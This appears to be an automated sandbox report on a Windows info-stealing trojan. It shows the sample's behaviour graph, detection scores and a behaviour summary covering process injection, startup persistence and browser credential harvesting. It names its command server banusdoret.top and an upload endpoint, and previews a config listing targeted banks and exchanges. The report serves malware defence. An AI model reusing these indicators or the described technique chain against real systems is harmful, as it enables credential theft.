Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobAccess Token Manipulation21Proc FilesystemApplication Window Discovery11Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Process Injection212/etc/passwd and /etc/shadowRemote System Discovery11Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork SniffingSystem Network Configuration Discovery2Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 383838 Sample: WDnE51mua6.exe Startdate: 08/04/2021 Architecture: WINDOWS Score: 100 79 Antivirus detection for URL or domain 2->79 81 Multi AV Scanner detection for submitted file 2->81 83 Sigma detected: Drops script at startup location 2->83 85 Machine Learning detection for sample 2->85 10 WDnE51mua6.exe 7 2->10         started        13 juROhmfLml.exe.com 2->13         started        16 wscript.exe 2->16         started        process3 dnsIp4 101 Contains functionality to register a low level keyboard hook 10->101 18 cmd.exe 1 10->18         started        21 svchost.exe 10->21         started        77 zjZFqZYoOtpryMyR.zjZFqZYoOtpryMyR 13->77 103 Uses nslookup.exe to query domains 13->103 105 Writes to foreign memory regions 13->105 107 Injects a PE file into a foreign processes 13->107 23 nslookup.exe 21 13->23         started        109 Creates processes via WMI 16->109 signatures5 process6 dnsIp7 87 Submitted sample is a known malware sample 18->87 89 Obfuscated command line found 18->89 91 Uses ping.exe to sleep 18->91 93 Uses ping.exe to check the status of other devices and networks 18->93 26 cmd.exe 3 18->26         started        29 conhost.exe 18->29         started        69 banusdoret.top 8.208.95.18, 443, 49730, 49736 CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC Singapore 23->69 95 Tries to harvest and steal browser information (history, passwords, etc) 23->95 31 cmd.exe 1 23->31         started        33 cmd.exe 1 23->33         started        35 cmd.exe 1 23->35         started        signatures8 process9 signatures10 111 Obfuscated command line found 26->111 113 Uses ping.exe to sleep 26->113 37 Gia.exe.com 26->37         started        40 PING.EXE 1 26->40         started        43 findstr.exe 1 26->43         started        46 WMIC.exe 1 31->46         started        48 conhost.exe 31->48         started        50 makecab.exe 11 33->50         started        52 conhost.exe 33->52         started        54 conhost.exe 35->54         started        process11 dnsIp12 97 Drops PE files with a suspicious file extension 37->97 99 Uses nslookup.exe to query domains 37->99 56 Gia.exe.com 6 37->56         started        71 127.0.0.1 unknown unknown 40->71 73 192.168.2.1 unknown unknown 40->73 67 C:\Users\user\AppData\Roaming\...behaviorgraphia.exe.com, Targa 43->67 dropped file13 signatures14 process15 dnsIp16 75 zjZFqZYoOtpryMyR.zjZFqZYoOtpryMyR 56->75 63 C:\Users\user\AppData\...\juROhmfLml.exe.com, PE32 56->63 dropped 65 C:\Users\user\AppData\...\juROhmfLml.url, MS 56->65 dropped 115 Uses nslookup.exe to query domains 56->115 117 Writes to foreign memory regions 56->117 119 Injects a PE file into a foreign processes 56->119 61 nslookup.exe 56->61         started        file17 signatures18 process19

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
WDnE51mua6.exe42%VirustotalBrowse
WDnE51mua6.exe8%MetadefenderBrowse
WDnE51mua6.exe65%ReversingLabsWin32.Trojan.Crypzip
WDnE51mua6.exe100%Joe Sandbox ML

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.com3%MetadefenderBrowse
C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.com2%ReversingLabs

Unpacked PE Files

SourceDetectionScannerLabelLinkDownload
0.1.WDnE51mua6.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://banusdoret.top/4624a8e10d6df3306e1dd46223b6b1968208dd491100%Avira URL Cloudphishing
https://banusdoret.top/4624a8e10d6df3306e1dd46223b6b1968208dd49r100%Avira URL Cloudphishing
https://banusdoret.top/upload/upload.php100%Avira URL Cloudphishing
https://banusdoret.topctionSettings0%Avira URL Cloudsafe
https://banusdoret.top/kh=100%Avira URL Cloudphishing
http://cps.letsencrypt.org00%URL Reputationsafe
http://cps.letsencrypt.org00%URL Reputationsafe
http://cps.letsencrypt.org00%URL Reputationsafe
https://banusdoret.top/8100%Avira URL Cloudphishing
https://banusdoret.top/hi0100%Avira URL Cloudphishing
https://banusdoret.top/upload/upload.phpmit100%Avira URL Cloudphishing
https://banusdoret.top/upload/upload.phpp/hi0100%Avira URL Cloudphishing
https://banusdoret.top/#hu100%Avira URL Cloudphishing
https://banusdoret.top/4624a8e10d6df3306e1dd46223b6b1968208dd49100%Avira URL Cloudphishing
https://banusdoret.top/5hc100%Avira URL Cloudphishing
https://banusdoret.top/ography100%Avira URL Cloudphishing
http://cps.root0%Avira URL Cloudsafe
https://banusdoret.top/4624a8e10d6df3306e1dd46223b6b1968208dd49lcanoconiosispZ100%Avira URL Cloudphishing
https://banusdoret.top/100%Avira URL Cloudphishing
http://r3.i.lencr.org/0-0%Avira URL Cloudsafe
https://banusdoret.top/sFt100%Avira URL Cloudphishing
https://banusdoret.top/Dg100%Avira URL Cloudphishing
http://r3.o.lencr.org00%URL Reputationsafe
http://r3.o.lencr.org00%URL Reputationsafe
http://r3.o.lencr.org00%URL Reputationsafe
https://banusdoret.top/Vg100%Avira URL Cloudphishing
https://banusdoret.top/oi9100%Avira URL Cloudphishing
http://cps.root-x1.letsencrypt.org00%URL Reputationsafe
http://cps.root-x1.letsencrypt.org00%URL Reputationsafe
http://cps.root-x1.letsencrypt.org00%URL Reputationsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
banusdoret.top
8.208.95.18
truefalse
    unknown
    zjZFqZYoOtpryMyR.zjZFqZYoOtpryMyR
    unknown
    unknownfalse
      unknown

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      https://banusdoret.top/4624a8e10d6df3306e1dd46223b6b1968208dd491nslookup.exe, 00000010.00000002.591956638.0000000003B7E000.00000004.00000020.sdmptrue
      • Avira URL Cloud: phishing
      unknown
      https://banusdoret.top/4624a8e10d6df3306e1dd46223b6b1968208dd49rnslookup.exe, 00000010.00000002.591956638.0000000003B7E000.00000004.00000020.sdmptrue
      • Avira URL Cloud: phishing
      unknown
      https://banusdoret.top/upload/upload.phpnslookup.exe, 00000010.00000002.591747509.0000000003B37000.00000004.00000020.sdmptrue
      • Avira URL Cloud: phishing
      unknown
      https://banusdoret.topctionSettingsnslookup.exe, 00000010.00000003.567033832.0000000003BE2000.00000004.00000001.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://banusdoret.top/kh=nslookup.exe, 00000010.00000003.567033832.0000000003BE2000.00000004.00000001.sdmptrue
      • Avira URL Cloud: phishing
      unknown
      http://cps.letsencrypt.org0nslookup.exe, 00000010.00000003.582514052.0000000003BB4000.00000004.00000001.sdmpfalse
      • URL Reputation: safe
      • URL Reputation: safe
      • URL Reputation: safe
      unknown
      https://banusdoret.top/8nslookup.exe, 00000010.00000002.591956638.0000000003B7E000.00000004.00000020.sdmptrue
      • Avira URL Cloud: phishing
      unknown
      https://banusdoret.top/hi0nslookup.exe, 00000010.00000003.536247326.0000000003BE2000.00000004.00000001.sdmptrue
      • Avira URL Cloud: phishing
      unknown
      https://banusdoret.top/upload/upload.phpmitnslookup.exe, 00000010.00000003.532175709.0000000003BE2000.00000004.00000001.sdmptrue
      • Avira URL Cloud: phishing
      unknown
      https://banusdoret.top/upload/upload.phpp/hi0nslookup.exe, 00000010.00000003.532175709.0000000003BE2000.00000004.00000001.sdmptrue
      • Avira URL Cloud: phishing
      unknown
      http://www.autoitscript.com/autoit3/XGia.exe.com, 00000006.00000000.354716969.0000000000985000.00000002.00020000.sdmp, Gia.exe.com, 00000007.00000002.502867230.0000000000985000.00000002.00020000.sdmp, juROhmfLml.exe.com, 0000000C.00000002.529162484.00000000002F5000.00000002.00020000.sdmp, Gia.exe.com.5.drfalse
        high
        https://banusdoret.top/#hunslookup.exe, 00000010.00000003.567033832.0000000003BE2000.00000004.00000001.sdmptrue
        • Avira URL Cloud: phishing
        unknown
        https://banusdoret.top/4624a8e10d6df3306e1dd46223b6b1968208dd49nslookup.exe, 00000010.00000002.591863693.0000000003B64000.00000004.00000020.sdmptrue
        • Avira URL Cloud: phishing
        unknown
        https://banusdoret.top/5hcnslookup.exe, 00000010.00000003.567033832.0000000003BE2000.00000004.00000001.sdmptrue
        • Avira URL Cloud: phishing
        unknown
        https://banusdoret.top/ographynslookup.exe, 00000010.00000002.591956638.0000000003B7E000.00000004.00000020.sdmptrue
        • Avira URL Cloud: phishing
        unknown
        https://www.autoitscript.com/autoit3/Gia.exe.com, 00000007.00000003.481000705.0000000003800000.00000004.00000001.sdmp, Gia.exe.com.5.drfalse
          high
          http://cps.rootnslookup.exe, 00000010.00000003.514415275.0000000003B97000.00000004.00000001.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://banusdoret.top/4624a8e10d6df3306e1dd46223b6b1968208dd49lcanoconiosispZnslookup.exe, 00000010.00000002.591717257.0000000003B30000.00000004.00000020.sdmptrue
          • Avira URL Cloud: phishing
          unknown
          https://banusdoret.top/nslookup.exe, 00000010.00000003.567033832.0000000003BE2000.00000004.00000001.sdmp, nslookup.exe, 00000010.00000003.584413680.0000000003BE2000.00000004.00000001.sdmptrue
          • Avira URL Cloud: phishing
          unknown
          http://r3.i.lencr.org/0-nslookup.exe, 00000010.00000003.582514052.0000000003BB4000.00000004.00000001.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://banusdoret.top/sFtnslookup.exe, 00000010.00000002.591863693.0000000003B64000.00000004.00000020.sdmptrue
          • Avira URL Cloud: phishing
          unknown
          https://banusdoret.top/Dgnslookup.exe, 00000010.00000003.584413680.0000000003BE2000.00000004.00000001.sdmptrue
          • Avira URL Cloud: phishing
          unknown
          http://r3.o.lencr.org0nslookup.exe, 00000010.00000003.582514052.0000000003BB4000.00000004.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          unknown
          https://banusdoret.top/Vgnslookup.exe, 00000010.00000003.567033832.0000000003BE2000.00000004.00000001.sdmptrue
          • Avira URL Cloud: phishing
          unknown
          https://banusdoret.top/oi9nslookup.exe, 00000010.00000003.544012619.0000000003BE2000.00000004.00000001.sdmptrue
          • Avira URL Cloud: phishing
          unknown
          http://cps.root-x1.letsencrypt.org0nslookup.exe, 00000010.00000003.582514052.0000000003BB4000.00000004.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          unknown

          Contacted IPs

          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs

          Public

          IPDomainCountryFlagASNASN NameMalicious
          8.208.95.18
          banusdoret.topSingapore
          45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCfalse

          Private

          IP
          192.168.2.1
          127.0.0.1

          General Information

          Joe Sandbox Version:31.0.0 Emerald
          Analysis ID:383838
          Start date:08.04.2021
          Start time:10:49:33
          Joe Sandbox Product:CloudBasic
          Overall analysis duration:0h 13m 52s
          Hypervisor based Inspection enabled:false
          Report type:light
          Sample file name:WDnE51mua6.exe
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
          Number of analysed new started processes analysed:35
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • HDC enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Detection:MAL
          Classification:mal100.troj.spyw.evad.winEXE@35/26@3/3
          EGA Information:Failed
          HDC Information:
          • Successful, ratio: 55.9% (good quality ratio 53.2%)
          • Quality average: 86.4%
          • Quality standard deviation: 24.4%
          HCA Information:Failed
          Cookbook Comments:
          • Adjust boot time
          • Enable AMSI
          • Found application associated with file extension: .exe
          Warnings:
          Show All
          • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
          • TCP Packets have been reduced to 100
          • Excluded IPs from analysis (whitelisted): 13.88.21.125, 104.43.139.144, 40.88.32.150, 13.64.90.137, 52.147.198.201, 20.82.210.154, 23.10.249.26, 23.10.249.43, 104.43.193.48, 95.100.54.203, 20.54.26.129, 23.54.113.53
          • Excluded domains from analysis (whitelisted): skypedataprdcolwus17.cloudapp.net, arc.msn.com.nsatc.net, fs.microsoft.com, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, store-images.s-microsoft.com-c.edgekey.net, skypedataprdcolcus16.cloudapp.net, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, skypedataprdcolcus15.cloudapp.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus15.cloudapp.net, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, skypedataprdcolwus15.cloudapp.net
          • Report size exceeded maximum capacity and may have missing behavior information.
          • Report size exceeded maximum capacity and may have missing disassembly code.
          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtProtectVirtualMemory calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          • Report size getting too big, too many NtSetInformationFile calls found.

          Simulations

          Behavior and APIs

          TimeTypeDescription
          10:50:40API Interceptor1x Sleep call for process: Gia.exe.com modified
          10:50:41AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\juROhmfLml.url
          10:50:52API Interceptor1x Sleep call for process: juROhmfLml.exe.com modified
          10:51:53API Interceptor1x Sleep call for process: WMIC.exe modified
          10:51:59API Interceptor74x Sleep call for process: nslookup.exe modified

          Joe Sandbox View / Context

          IPs

          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
          8.208.95.185zc9vbGBo3.exeGet hashmaliciousBrowse
          • dolboeb1701.com/bgczXibj92HSlSCK/util.php
          InnAcjnAmG.exeGet hashmaliciousBrowse
          • dolboeb1701.com/bgczXibj92HSlSCK/util.php
          DP5kUHHaWs.exeGet hashmaliciousBrowse
          • dolboeb1701.com/bgczXibj92HSlSCK/util.php
          Zc0HsqUzyy.exeGet hashmaliciousBrowse
          • dolboeb1701.com/bgczXibj92HSlSCK/util.php
          8X93Tzvd7V.exeGet hashmaliciousBrowse
          • dolboeb1701.com/bgczXibj92HSlSCK/util.php
          u8A8Qy5S7O.exeGet hashmaliciousBrowse
          • dolboeb1701.com/bgczXibj92HSlSCK/util.php
          SecuriteInfo.com.Mal.GandCrypt-A.5674.exeGet hashmaliciousBrowse
          • dolboeb1701.com/bgczXibj92HSlSCK/util.php

          Domains

          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
          banusdoret.topyPkfbflyoh.exeGet hashmaliciousBrowse
          • 8.208.95.18
          JYDy1dAHdW.exeGet hashmaliciousBrowse
          • 8.208.95.18
          EppTbowa74.exeGet hashmaliciousBrowse
          • 8.208.95.18
          tcNbszVulx.exeGet hashmaliciousBrowse
          • 8.208.95.18
          USHrlfZEJC.exeGet hashmaliciousBrowse
          • 8.208.95.18
          MmuRNUcd2B.exeGet hashmaliciousBrowse
          • 8.208.95.18

          ASN

          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
          CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCdocuments-2112491607.xlsmGet hashmaliciousBrowse
          • 8.211.4.209
          documents-1660683173.xlsmGet hashmaliciousBrowse
          • 8.211.4.209
          0406_37400496097832.docGet hashmaliciousBrowse
          • 8.208.95.92
          32_64_ver_2_bit.exeGet hashmaliciousBrowse
          • 8.209.67.151
          1234.xlsmGet hashmaliciousBrowse
          • 8.211.4.209
          12345.xlsmGet hashmaliciousBrowse
          • 8.211.4.209
          1234.xlsmGet hashmaliciousBrowse
          • 8.211.4.209
          documents-748443571.xlsmGet hashmaliciousBrowse
          • 8.211.4.209
          12345.xlsmGet hashmaliciousBrowse
          • 8.211.4.209
          documents-1887159634.xlsmGet hashmaliciousBrowse
          • 8.211.4.209
          documents-748443571.xlsmGet hashmaliciousBrowse
          • 8.211.4.209
          documents-1887159634.xlsmGet hashmaliciousBrowse
          • 8.211.4.209
          L87N50MbDG.exeGet hashmaliciousBrowse
          • 8.209.67.151
          documents-683917632.xlsmGet hashmaliciousBrowse
          • 8.211.4.209
          documents-683917632.xlsmGet hashmaliciousBrowse
          • 8.211.4.209
          documents-1760163871.xlsmGet hashmaliciousBrowse
          • 8.211.4.209
          documents-1760163871.xlsmGet hashmaliciousBrowse
          • 8.211.4.209
          Proforma invoice.docGet hashmaliciousBrowse
          • 47.244.190.114
          yPkfbflyoh.exeGet hashmaliciousBrowse
          • 8.208.95.18
          4CwmE1pYh5.exeGet hashmaliciousBrowse
          • 47.91.72.80

          JA3 Fingerprints

          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
          37f463bf4616ecd445d4a1937da06e19ikoAImKWvI.exeGet hashmaliciousBrowse
          • 8.208.95.18
          V7UnYc7CCN.exeGet hashmaliciousBrowse
          • 8.208.95.18
          SM25.vbsGet hashmaliciousBrowse
          • 8.208.95.18
          FQ45.vbsGet hashmaliciousBrowse
          • 8.208.95.18
          Signed pages of agreement copy.htmlGet hashmaliciousBrowse
          • 8.208.95.18
          Payment Report.htmlGet hashmaliciousBrowse
          • 8.208.95.18
          dMeVLLeyLc.exeGet hashmaliciousBrowse
          • 8.208.95.18
          avast_secure_browser_setup.exeGet hashmaliciousBrowse
          • 8.208.95.18
          PaymentAdvice-copy.htmGet hashmaliciousBrowse
          • 8.208.95.18
          57fvgYpwnN.exeGet hashmaliciousBrowse
          • 8.208.95.18
          8e29685862fc0d569411c311852d3bb2da2eedb25fc9085a95020b17ddc073a9.xlsGet hashmaliciousBrowse
          • 8.208.95.18
          9mm case for ROYAL METAL INDUSTRIES 3milmonth Specification drawings.exeGet hashmaliciousBrowse
          • 8.208.95.18
          Scan emco Bautechni specification.ppsGet hashmaliciousBrowse
          • 8.208.95.18
          Lista e porosive te blerjes.exeGet hashmaliciousBrowse
          • 8.208.95.18
          Notice-039539.xlsmGet hashmaliciousBrowse
          • 8.208.95.18
          IMG_767893434432.exeGet hashmaliciousBrowse
          • 8.208.95.18
          OH76.vbsGet hashmaliciousBrowse
          • 8.208.95.18
          INVOICE_.EXEGet hashmaliciousBrowse
          • 8.208.95.18
          FED8GODpaD.xlsbGet hashmaliciousBrowse
          • 8.208.95.18
          JANUARY OVERDUE INVOICE.pdf.exeGet hashmaliciousBrowse
          • 8.208.95.18

          Dropped Files

          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
          C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.comyPkfbflyoh.exeGet hashmaliciousBrowse
            JYDy1dAHdW.exeGet hashmaliciousBrowse
              EppTbowa74.exeGet hashmaliciousBrowse
                tcNbszVulx.exeGet hashmaliciousBrowse
                  USHrlfZEJC.exeGet hashmaliciousBrowse
                    mcRrjT7JMX.exeGet hashmaliciousBrowse
                      3MWIYkDesa.exeGet hashmaliciousBrowse
                        3MWIYkDesa.exeGet hashmaliciousBrowse
                          MmuRNUcd2B.exeGet hashmaliciousBrowse
                            23j6ZPLfOh.exeGet hashmaliciousBrowse
                              23j6ZPLfOh.exeGet hashmaliciousBrowse
                                tl2uliYxhr.exeGet hashmaliciousBrowse
                                  xARcpdYdew.exeGet hashmaliciousBrowse
                                    vtg3HBN11U.exeGet hashmaliciousBrowse
                                      01FRraMfKS.exeGet hashmaliciousBrowse
                                        PzmkDJz80S.exeGet hashmaliciousBrowse
                                          dq1pzC7LNO.exeGet hashmaliciousBrowse
                                            atikmdag-patcher 1.4.7.exeGet hashmaliciousBrowse
                                              hfix.exeGet hashmaliciousBrowse
                                                atikmdag-patcher 1.4.8.exeGet hashmaliciousBrowse

                                                  Created / dropped Files

                                                  C:\Users\user\AppData\Local\Temp\4624a8e10d6df3306e1dd46223b6b1968208dd49
                                                  Process:C:\Windows\SysWOW64\nslookup.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):23428
                                                  Entropy (8bit):7.662543821371996
                                                  Encrypted:false
                                                  SSDEEP:384:h3Bm2JdLVjjNvWdQg8ZztS13wr7U1NVp7PqCxWG41BBnzz9dV:hxm2JdBjFgt1wr7OVpjqQsX39dV
                                                  MD5:B83C81F14AF24C10C2ED43996409795A
                                                  SHA1:1257FF605B3BC8E2FC0F28195481DD8A74DDAC0D
                                                  SHA-256:C5407A1C6D5882DC61D0D9CFA6BF4D8A0E5DF1C1C25DDB1B23BF7804236A2960
                                                  SHA-512:3724A15D91DA9315133FA18CDBDF75CCDEEE624A962E63375AF4BB99CA3A855B44CE9787687E4CE7EE0FFEE1BDBD0BD82192B504D6C07EB43D3D570564E16C2D
                                                  Malicious:false
                                                  Preview: {"is_interesting_client": "0","client_id": "4624a8e10d6df3306e1dd46223b6b1968208dd49","windows_version": "Microsoft Windows [Version 10.0.17134.1]","is_x64": "1","browsers": {"Chrome": "0"},"urls": {"53.com": "0","SchoolsFirstFCU.org": "0","SouthlandCU.org": "0","abesofmaine.com": "0","achievacu.com": "0","aflcioefcu.org": "0","alaskausa.org": "0","alliantcreditunion.org": "0","altabank.com ": "0","alterna.ca": "0","amazon.com": "0","americafirst.com": "0","americanexpress.com": "0","apcifcu.org ": "0","apple.com": "0","arsenalcu.com": "0","ascend.org": "0","ascu.org ": "0","asurion.com": "0","att.com": "0","bankofamerica.com": "0","bankofthewest.com": "0","bbt.com": "0","becu.org": "0","bestbay.com": "0","bestbuy.com": "0","big.one": "0","biki.com": "0","bilaxy.com": "0","binance.com": "0","binance.us": "0","bitbank.cc": "0","bitfinex": "0","bitfinex.com": "0","bitflyer.com": "0","bithumb.com": "0","bithumb.pro": "0","bitkub.com": "0","bitmax.io": "0","bitmex.com": "0","bitopro.com":
                                                  C:\Users\user\AppData\Local\Temp\cab_5036_2
                                                  Process:C:\Windows\SysWOW64\makecab.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1819
                                                  Entropy (8bit):7.894468236667479
                                                  Encrypted:false
                                                  SSDEEP:48:JYUJf0QjN/JHrNeH0rRIRfCMHc2QvVGQc:Cwf0QjheH8kHc1Vi
                                                  MD5:CFAF155E352CF3168AAFB3E2F147C54E
                                                  SHA1:7404C60D379CDFB21F2E28AC02E3E8C6B2EAE1D6
                                                  SHA-256:0ED4FF0E634BE10A9001EEBC4A49911997410967E96B33144A34AF56F5000C2E
                                                  SHA-512:6D7ECD4B91210EE0BFE4AF8BCDEECFBFA6863F61CFBCC8D403C97C2A20D10510DA54BA0161C74FB5451A0AEF669EE87C261D24ED0BAE4D3286AB0813B843F7B7
                                                  Malicious:false
                                                  Preview: ........CK.X..6....9).-..>..`..$.Lf. ...,.uqt).;...rW...Y._.G.M..!U.\..Q....I...4Z.t......W..Q..........u..vww...m...5.....n._....f.Z?.;.....~.e..wi..........z{......~{.'v...}.t...P.&......Z....U.f...Jo.n....&..CL?<~....|N.....h.|.B;U..r.j'd&`g....Z[0"."GAA..K2.V..pX..D#.X.o*P.'.R..+...........^...O.g$K.....?5M..7D.a.R........f.&.Y9....\H...=K.PQ..F.R#...(SH.[..Y.5]6b.68.z...5l.B:....N....l...)...3W.b.........M.|.e........N..K.}nd..r..........o.f...*chV5.`).%iE.U...$S.#Q.rT.O...'.....d)J9.b.I.E./.I_ION'iEA..b.`..Pupq..~....?-.D...O...}.y]...j.'..5.c.S..S.\@{.X........#r.>.....k..i./....Gv.3.....v.vk.W..*.-...*.f.....>.J%.2_..W..........3..V.9...MC.B...-.wi[.bs...;.O.Q,....d...S.....i)...W...HEC..-.N.PF...N$T9U.R..*.:...@?.WK14.c.|~..xY(...d.."...|@g"HX...*.{E..+.....qa..{.1...i.qu...>.Yh.jO.|.v....=x....9.d[5.D.D.{..r........}C.@3F-.e+H...D.bT......J..sHuOeV,..~.ho..j..&.`,..d.e.%d...I....4......eu.tD.%Li=..my>.P....S.m..6.I..If8......E..
                                                  C:\Users\user\AppData\Local\Temp\cab_5036_3
                                                  Process:C:\Windows\SysWOW64\makecab.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):57
                                                  Entropy (8bit):3.9862517516001557
                                                  Encrypted:false
                                                  SSDEEP:3:9ZREMSHGHT0EnUn:9cMSHGHgnn
                                                  MD5:478B9568815F608EC7213D351CBD8CDB
                                                  SHA1:89743EC25D75E6EA4290CF5C90C1460A8C833FE9
                                                  SHA-256:D611A9CB064EE6F5D9ACDD2632FAFE2EB8EE0DE3DB8551B4AB42ABE3ED4F36C8
                                                  SHA-512:A796180D4BA1BECF89A8A85AB3D2BFAB271B1F9D8697A3BF5B8DE141F5AABCFB75E515FBC7CAD21C6640B57AAB485A3B41AF098448373500DEEA8ED7DD05C1E8
                                                  Malicious:false
                                                  Preview: ...........R}V .4624a8e10d6df3306e1dd46223b6b1968208dd49.
                                                  C:\Users\user\AppData\Local\Temp\cab_5036_4
                                                  Process:C:\Windows\SysWOW64\makecab.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1819
                                                  Entropy (8bit):7.896214873025922
                                                  Encrypted:false
                                                  SSDEEP:48:IvYUJf0QjN/JHrNeH0rRIRfCMHc2QvVGQc:zwf0QjheH8kHc1Vi
                                                  MD5:1A5DAC8AEB202A00C054E1C9CAC02B3D
                                                  SHA1:9DC1BF7A70ADF481590B07D587F83185CCB6B9F9
                                                  SHA-256:D1521BB1E2238F4587055AC303A1FB5377285B5FE607756572B83259DB8F94D5
                                                  SHA-512:0F2D3517B42C33EC88FA1DC364E202DB2E22752B5E23E35591A0619EAE8CC9D766A5D766ECFEF1799B00AA7ACD12D4448834AAE934800A68AD39702E55AAE7DE
                                                  Malicious:false
                                                  Preview: L.......CK.X..6....9).-..>..`..$.Lf. ...,.uqt).;...rW...Y._.G.M..!U.\..Q....I...4Z.t......W..Q..........u..vww...m...5.....n._....f.Z?.;.....~.e..wi..........z{......~{.'v...}.t...P.&......Z....U.f...Jo.n....&..CL?<~....|N.....h.|.B;U..r.j'd&`g....Z[0"."GAA..K2.V..pX..D#.X.o*P.'.R..+...........^...O.g$K.....?5M..7D.a.R........f.&.Y9....\H...=K.PQ..F.R#...(SH.[..Y.5]6b.68.z...5l.B:....N....l...)...3W.b.........M.|.e........N..K.}nd..r..........o.f...*chV5.`).%iE.U...$S.#Q.rT.O...'.....d)J9.b.I.E./.I_ION'iEA..b.`..Pupq..~....?-.D...O...}.y]...j.'..5.c.S..S.\@{.X........#r.>.....k..i./....Gv.3.....v.vk.W..*.-...*.f.....>.J%.2_..W..........3..V.9...MC.B...-.wi[.bs...;.O.Q,....d...S.....i)...W...HEC..-.N.PF...N$T9U.R..*.:...@?.WK14.c.|~..xY(...d.."...|@g"HX...*.{E..+.....qa..{.1...i.qu...>.Yh.jO.|.v....=x....9.d[5.D.D.{..r........}C.@3F-.e+H...D.bT......J..sHuOeV,..~.ho..j..&.`,..d.e.%d...I....4......eu.tD.%Li=..my>.P....S.m..6.I..If8......E..
                                                  C:\Users\user\AppData\Local\Temp\cab_5036_5
                                                  Process:C:\Windows\SysWOW64\makecab.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):57
                                                  Entropy (8bit):3.9862517516001557
                                                  Encrypted:false
                                                  SSDEEP:3:9ZREMSHGHT0EnUn:9cMSHGHgnn
                                                  MD5:478B9568815F608EC7213D351CBD8CDB
                                                  SHA1:89743EC25D75E6EA4290CF5C90C1460A8C833FE9
                                                  SHA-256:D611A9CB064EE6F5D9ACDD2632FAFE2EB8EE0DE3DB8551B4AB42ABE3ED4F36C8
                                                  SHA-512:A796180D4BA1BECF89A8A85AB3D2BFAB271B1F9D8697A3BF5B8DE141F5AABCFB75E515FBC7CAD21C6640B57AAB485A3B41AF098448373500DEEA8ED7DD05C1E8
                                                  Malicious:false
                                                  Preview: ...........R}V .4624a8e10d6df3306e1dd46223b6b1968208dd49.
                                                  C:\Users\user\AppData\Local\Temp\cab_5036_6
                                                  Process:C:\Windows\SysWOW64\makecab.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):8
                                                  Entropy (8bit):0.8112781244591328
                                                  Encrypted:false
                                                  SSDEEP:3:P:P
                                                  MD5:7B5B6C7BF41E6055ABD4E74476E08575
                                                  SHA1:5C05D3A68F69258D236F6D9677CC0A42E399E7CC
